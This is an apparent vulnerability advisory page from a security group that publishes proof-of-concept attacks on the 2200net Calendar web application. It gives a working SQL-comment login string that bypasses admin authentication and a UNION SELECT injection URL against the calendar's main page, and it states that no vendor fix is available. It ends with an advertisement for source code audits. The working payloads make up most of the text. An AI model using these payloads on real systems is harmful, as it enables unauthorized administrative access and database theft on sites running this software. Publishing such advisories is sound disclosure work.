PoC/Exploit for SQL-inj and Auth Bypass in 2200net Calendar system

Published Proof of Concept code - SQL-inj and Auth Bypass in 2200net Calendar system.

Description
Available
Solution
Not available - check vendor's website

Authorization Bypass.

url: http://host/cal/admin.php?ad=login

login account: ' or 1/*

login password: any

SQL Injection Example.

http://host/cal/main.php?&po=calendar&op=calendar_only&fm_data[id]=999'%20union%20select%201,2,3,4,5,6,7,8,9/*

Order Source Code Test

You may order source code audit of your site made by eVuln team.The task will be done by specialists in web security.

Advisories by vuln type